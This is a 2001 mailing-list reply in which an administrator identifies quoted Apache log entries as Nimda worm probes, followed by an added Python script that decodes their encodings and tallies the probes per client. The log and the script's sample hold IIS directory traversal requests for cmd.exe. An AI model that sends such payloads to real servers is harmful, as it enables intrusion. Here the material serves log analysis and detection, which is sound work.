Re: [cobalt-users] access log weird stuff. hacker or virus
- Subject: Re: [cobalt-users] access log weird stuff. hacker or virus
- From: Marco Baurdoux <linux@xxxxxxxxxxxxx>
- Date: Thu Sep 27 16:07:11 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
On 28.9.2001 6:45, brain_damaged at brain_damaged@xxxxxxxxxxxxxxxxxxxx wrote:
> Hello,
> I went and checked my access log and saw this stuff.
> Looking for winnt on a Linux system?
>
>
> tail access
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
> [root httpd]#
Looks very much like Nimda!!
You missed the wave .-))
=======================================================================
Marco Baurdoux
Unix Administrator
Infomaniak Network SA
Avenue de la Praille 26
1227 Carouge
Switzerland
Tel: +41 (0)22 820 35 41
Fax: +41 (0)22 820 35 46
http://web.infomaniak.ch
Linux/Unix is very user friendly,
it's just very picky about who its friends are !!!
=======================================================================
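
An added example, not part of the original thread: a small triage script that normalises the nested percent-encoding and overlong UTF-8 forms seen in the quoted log, then counts `cmd.exe` traversal probes per client together with the status codes the server returned. The sample lines are constructed (placeholder host and addresses, request paths taken from the quoted log), and the names `normalise` and `summarise` are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in the layout of the quoted log: vhost, client, ident,
# user, [time], "request", status, bytes. Host and addresses are placeholders;
# the request paths are four of the variants quoted above plus one benign hit.
SAMPLE = r'''
www.example.test 192.0.2.10 - - [28/Sep/2001:00:30:17 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280 "-" "-"
www.example.test 192.0.2.10 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.example.test 192.0.2.10 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.example.test 192.0.2.10 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.example.test 192.0.2.77 - - [28/Sep/2001:00:31:02 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
'''

LINE_RE = re.compile(r'^\S+ (\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
OVERLONG = re.compile(rb'([\xc0\xc1])(.)', re.S)

def normalise(target: str) -> str:
    """Undo nested percent-encoding and overlong 2-byte UTF-8, return the path."""
    raw = target.split('?', 1)[0].encode('latin-1', 'replace')
    for _ in range(4):                       # bounded: stop once decoding is stable
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    # Example's choice: fold any 0xC0/0xC1 pair to ASCII, valid continuation or not,
    # so that %c1%1c and %c0%2f are caught as well as %c1%9c and %c0%af.
    raw = OVERLONG.sub(lambda m: bytes([((m[1][0] & 0x1F) << 6) | (m[2][0] & 0x3F)]), raw)
    return raw.decode('latin-1').replace('\\', '/').lower()

def summarise(log_text: str) -> dict:
    """Per client: number of traversal probes for cmd.exe and the statuses returned."""
    out = defaultdict(lambda: {'probes': 0, 'statuses': set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path = normalise(target)
        if '../' in path and path.endswith('cmd.exe'):
            out[client]['probes'] += 1
            out[client]['statuses'].add(int(status))
    return dict(out)

if __name__ == '__main__':
    for client, info in summarise(SAMPLE).items():
        served = any(200 <= s < 300 for s in info['statuses'])
        print(client, info['probes'], sorted(info['statuses']), 'SERVED' if served else 'not served')
```

A 2xx status on one of these requests is the case that needs follow-up; every probe in the quoted log came back 302 or 400.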